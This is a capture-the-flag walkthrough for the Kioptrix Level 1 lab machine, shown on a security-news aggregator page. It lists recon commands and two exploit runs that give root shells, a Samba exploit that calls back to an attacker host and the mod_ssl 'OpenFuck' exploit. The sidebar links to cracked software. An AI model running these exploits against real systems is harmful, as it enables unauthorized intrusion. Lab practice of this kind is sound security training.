LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Kioptrix Level 1 Walkthrough

7 months ago 74
BOOK THIS SPACE FOR AD
ARTICLE AD

Erdemstar

Hello, in this article I will show you step by step how to solve Kioptrix Level 1. The purpose of this CTF will be to become root. Click to get more information about CTF.

LEVEL : Easy

Learning the target’s IP address with Netdiscover toolDetection of open ports with Nmap toolReverse Shell via Samba exploit (Solution 1)Collecting information via port 80 with Dirb and Nitko tools (Solution 2)Reverse Shell via OpenSSL exploit (Solution 2)

Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.

netdiscover -r 192.168.1.0/24

The detection of open ports on the target machine was done as follows.

nmap -A -Pn -n -sV -sC -p- --reason 192.168.1.104

Port 139 was detected as SAMBA smbd and further detailed information could not be obtained with the Nmap tool. In this step, a port scan was performed specifically for port 139 via the MSFConsole tool and a more detailed result was obtained.

Based on the information obtained, research was conducted and an exploit as follows was detected.

When the downloaded exploit is used with the following parameters, a shell that can run commands with root rights is obtained.

./smb -b 0 -c 192.168.1.2 -p 130 192.168.1.104

Fuzzing was performed via dirb on open port 80. Afterwards, robots.txt was visited among the paths obtained.

dirb http://192.168.1.104/

The paths in robots.txt were visited and no results were obtained. In this step, a tool called nikto was used to collect more information.

nikto --host 192.168.1.104

Using the Nitko tool, information as “mod_ssl 2.8.4” was obtained. When this information was searched on the internet, a Github repo was found as follows.

Expliot was run successfully by following the README.MD content in the relevant Repository and giving the appropriate parameters. After this process, a shell with root rights was received from the target.

./OpenFuck 0x6b 192.168.1.104 443 -c 40
I think this article is very useful in that you can use the information obtained from port enumeration to gain authority over the target with just a few operations without being too complicated.

Click here to see my other articles about OSCP Walkthrough. Link

Read Entire Article
  3. Kioptrix Level 1 Walkthrough

Related

Finding more subdomains.(part 2)

Finding more subdomains.(part 2)

Finding Low-Hanging Bugs: A Practical Guide with Commands

Finding Low-Hanging Bugs: A Practical Guide with Commands

30 Best Hacking Prompts

30 Best Hacking Prompts

The More Confident You Are About Your Testing, The Bigger the Bug You Missed

The More Confident You Are About Your Testing, The Bigger the Bug You Missed

8 Shocking Ways to Protect Your Identity Online

8 Shocking Ways to Protect Your Identity Online

JS Review and Abuse GraphQL Result 10xBAC + Admin Panel ATO

JS Review and Abuse GraphQL Result 10xBAC + Admin Panel ATO

Trending

1. Marco Jansen
2. Gukesh
3. Enviro Infra Engineers IPO allotment
4. Lucky Baskhar
5. Suraksha Diagnostic IPO GMP
6. Redmi Note 14
7. Thanksgiving
8. Hardik Pandya
9. New Zealand vs England
10. Moana 2

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved